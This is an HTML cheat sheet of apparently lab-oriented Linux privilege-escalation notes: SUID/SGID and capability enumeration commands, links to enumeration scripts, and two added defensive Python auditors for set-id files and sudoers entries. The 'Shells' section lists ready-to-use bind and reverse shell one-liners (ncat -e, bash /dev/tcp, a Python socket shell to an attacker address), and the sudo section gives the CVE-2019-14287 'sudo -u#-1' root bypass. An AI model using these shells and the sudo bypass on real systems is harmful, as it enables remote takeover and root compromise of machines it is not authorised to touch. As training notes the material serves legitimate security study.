<!DOCTYPE HTML>
<html>
<head>
<title>SUIDs</title>
</head>
<body>
<p style="text-align: left;"><strong><span style="color: rgb(0, 0, 0); font-size: 30px;"><u><span style="background-color: rgb(251, 160, 38);">GTFO Bins_________________________________________</span></u></span></strong></p>
<p><span style="font-size: 20px;"><a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></span></p>
<p><span style="font-size: 20px;"><br></span></p>
<p style="text-align: left;"><span style="color: rgb(0, 0, 0); font-size: 30px;"><strong><u><span style="background-color: rgb(147, 101, 184);">Find SUIDs_________________________________________</span></u></strong></span></p>
<p><span style="font-size: 24px;"><strong>How to find another user's capabilities or sudo permissions?</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><em>find / -user &lt;name&gt; -perm -4000 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><em>find / -perm -u=s -type f 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><strong>SGID</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm /2000</em></span></p>
<p><span style="font-size: 24px;"><strong>Both SUID and SGID</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm -6000 -type f 2>/dev/null</em> (note: <em>-perm /6000</em> matches files with either bit set, <em>-perm -6000</em> only those with both)</span></p>
<p><strong><span style="font-size: 24px;">Capabilities</span></strong></p>
<p><span style="font-size: 24px;"><em>getcap -r / 2>/dev/null</em></span></p>
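<p><span style="font-size: 24px;">The find commands above enumerate set-id files; from the defender's side the useful question is which of them are new. The following is an added example (not from these notes) that walks a tree with the same bit semantics as <em>find -perm -NNNN</em> (all bits) versus <em>-perm /NNNN</em> (any bit) and reports set-id files missing from a constructed known-good baseline.</span></p>

```python
"""Added example, not part of the original notes: audit SUID/SGID files
against a known-good baseline, with the same bit semantics as the find(1)
commands above (-perm -NNNN = all bits set, -perm /NNNN = any bit set)."""
import os
import stat

SUID, SGID = stat.S_ISUID, stat.S_ISGID  # 0o4000 and 0o2000


def perm_matches(mode, bits, require_all):
    """find -perm -bits when require_all is True, find -perm /bits otherwise."""
    masked = mode & bits
    return masked == bits if require_all else masked != 0


def classify(mode):
    """Label a mode the way the find commands above would."""
    if perm_matches(mode, SUID | SGID, True):
        return "suid+sgid"   # find / -perm -6000
    if perm_matches(mode, SUID, True):
        return "suid"        # find / -perm -4000
    if perm_matches(mode, SGID, True):
        return "sgid"        # find / -perm /2000
    return ""


def walk_setid(root):
    """Regular files under root with SUID and/or SGID set: {path: label}.
    Unreadable directories are skipped, like the 2>/dev/null above."""
    found = {}
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # do not follow symlinks (find default)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and classify(st.st_mode):
                found[path] = classify(st.st_mode)
    return found


def unexpected(found, baseline):
    """Set-id files not in the known-good baseline, sorted for diffing."""
    return sorted((p, lbl) for p, lbl in found.items() if p not in baseline)


if __name__ == "__main__":
    import sys
    # Constructed sample baseline; a real one is recorded from a clean install.
    BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"}
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, label in unexpected(walk_setid(root), BASELINE):
        print(f"{label:9s} {path}")
```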
<p style="text-align: left;"><span style="font-size: 30px;"><strong><u><span style="color: rgb(0, 0, 0); background-color: rgb(65, 168, 95);">Shells______________________________________________</span></u></strong></span></p>
<p><span style="font-size: 24px;"><strong>Start bind shell (on victim):</strong></span></p>
<p><span style="font-size: 24px;"><em>ncat -l -p PORT -e "/bin/bash -i"</em></span></p>
<p><span style="font-size: 24px;"><strong>Connect to bind shell (on attacker):</strong></span></p>
<p><span style="font-size: 24px;"><em>ncat IPaddr PORT</em></span></p>
<p><span style="font-size: 24px;"><strong>Listen for reverse shell (on attacker):</strong></span></p>
<p><span style="font-size: 24px;"><em>ncat -l -p PORT</em></span></p>
<p><span style="font-size: 24px;"><strong>Start reverse shell (on victim):</strong></span></p>
<p><span style="font-size: 24px;"><em>ncat IPaddr PORT -e "/bin/bash -i"</em></span></p>
<p><span style="font-size: 24px;"><strong>upgrade shell</strong></span></p>
<p><span style="font-size: 24px;"><em>python -c 'import pty; pty.spawn("/bin/bash")'</em></span></p>
<p><span style="font-size: 24px;"><em>SHELL=/bin/bash script -q /dev/null</em></span></p>
<p><span style="font-size: 24px;"><strong>Reverse Shell</strong></span></p>
<p><span style="font-size: 24px;"><em>bash -c "bash -i >& /dev/tcp/IPaddr/4444 0>&1"</em> (IPaddr is the attacker's tun0 address) - useful if you find a .sh file on the remote system</span></p>
<p><span style="font-size: 24px;"><strong>Python Reverse Shell</strong></span></p>
<p><span style="font-size: 24px;"><em>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IPaddr",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</em></span></p>
<p><span style="font-size: 24px;"><strong><u><span style="color: rgb(65, 168, 95);">Useful site for upgrading shells:</span></u></strong></span></p>
<p><a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys"><span style="font-size: 24px;">https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys</span></a></p>
<p><br></p>
<p style="text-align: left;"><strong><span style="font-size: 30px; color: rgb(0, 0, 0);"><u><span style="background-color: rgb(250, 197, 28);">Enumeration & Priv Esc Scripts_______________________</span></u></span></strong></p>
<p><span style="font-size: 24px;">LinEnum script: <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">Download a local copy of LinEnum</a></span></p>
<p><span style="font-size: 24px;">Linpeas script: <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS">Download a copy of Linpeas </a></span></p>
<p><span style="font-size: 24px;">lse.sh script: <a href="https://github.com/diego-treitos/linux-smart-enumeration">Download a copy of lse</a> </span></p>
<p><br></p>
<p style="text-align: left;"><span style="font-size: 30px;"><strong><u><span style="color: rgb(239, 239, 239); background-color: rgb(41, 105, 176);">Sudo Information: Usage and Vulnerability_______________</span></u></strong></span></p>
<p><span style="font-size: 24px;"><strong>Usage:</strong></span></p>
<ul>
<li><span style="font-size: 24px;">normal usage: <strong><em>sudo &lt;command&gt;</em></strong></span></li>
<li><span style="font-size: 24px;">to run as a specific user, give the uid manually: <strong><em>sudo -u#&lt;id&gt; &lt;command&gt;</em></strong></span></li>
<li><span style="font-size: 24px;">the config file is <strong>/etc/sudoers</strong></span></li>
<li><span style="font-size: 24px;">to edit it, use: <strong>sudo visudo</strong></span></li>
</ul>
<p><span style="font-size: 24px;"><strong>What is the vulnerability:</strong></span></p>
<p><span style="font-size: 24px;">Sudo vulnerability found in versions < 1.8.28: CVE-2019-14287</span></p>
<p><span style="font-size: 24px;">The issue stems from a sudoers entry of the following form:</span></p>
<p><span style="font-size: 24px;"><strong>{user name} ALL=(ALL, !root) NOPASSWD: ALL</strong></span></p>
<p><span style="font-size: 24px;">This is meant to let the user run commands as anyone except the superuser, so <strong>sudo -u#0</strong> is refused; however, <strong>sudo -u#-1</strong> is accepted, because -1 is not uid 0 and the kernel treats a uid of -1 in setresuid() as "leave unchanged", which keeps sudo's root privileges.</span></p>
<p><span style="font-size: 24px;"><strong><em>sudo -u#-1 (command)</em></strong> (or the unsigned equivalent <strong><em>sudo -u#4294967295 (command)</em></strong>)</span></p>
<p><span style="font-size: 24px;">Note: this only works if your user already has a (non-root) sudo entry of this form; it is fixed in sudo 1.8.28.</span></p>
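<p><span style="font-size: 24px;">Two things a defender wants here: a check that flags sudoers entries of the <em>(ALL, !root)</em> form, and a clear picture of why -1 passed the root exclusion. The following is an added example (not from these notes) that does both with a constructed sample sudoers file; the vulnerable/fixed checks are a simplified model of sudo's behaviour before and after 1.8.28, not sudo's own code.</span></p>

```python
"""Added example, not part of the original notes: flag sudoers Runas specs of
the CVE-2019-14287 form and model why 'sudo -u#-1' slipped past '!root'.
The sample sudoers text is constructed; the checks are a simplified model."""
import re

UID_MAX = 2**32 - 1  # 4294967295: what -1 becomes in an unsigned uid_t


def normalise_uid(arg):
    """Map the argument of 'sudo -u#<id>' as a (uid_t) cast would;
    None if it is not an integer."""
    if not re.fullmatch(r"-?\d+", arg):
        return None
    return int(arg) % 2**32  # "-1" -> 4294967295


def runas_root_excluded(line):
    """True for Runas specs like '(ALL, !root)' or '(ALL, !#0)'."""
    return re.search(r"\(\s*ALL\s*,\s*!\s*(root|#0)\s*\)", line) is not None


def vulnerable_check(requested):
    """Pre-1.8.28 model: anything but uid 0 passes the '!root' rule, so
    4294967295 passes; setresuid(-1, ...) then leaves the uid unchanged,
    and sudo was already running as root."""
    return requested != 0


def fixed_check(requested):
    """1.8.28+ model: uid -1 / UID_MAX is rejected as invalid."""
    return requested not in (0, UID_MAX)


def audit_sudoers(text):
    """(line number, entry) for each non-comment line that excludes only root."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if entry and not entry.startswith("#") and runas_root_excluded(entry):
            hits.append((n, entry))
    return hits


SAMPLE_SUDOERS = """# constructed sample /etc/sudoers
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL, !root) NOPASSWD: ALL
bob     ALL=(www-data) /usr/bin/less
"""

if __name__ == "__main__":
    for n, entry in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers line {n} excludes only root: {entry}")
    uid = normalise_uid("-1")
    print("uid -1 ->", uid, "| old sudo accepts:", vulnerable_check(uid),
          "| fixed sudo accepts:", fixed_check(uid))
```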
<p><br></p>
<p><br></p>
</body>
</html>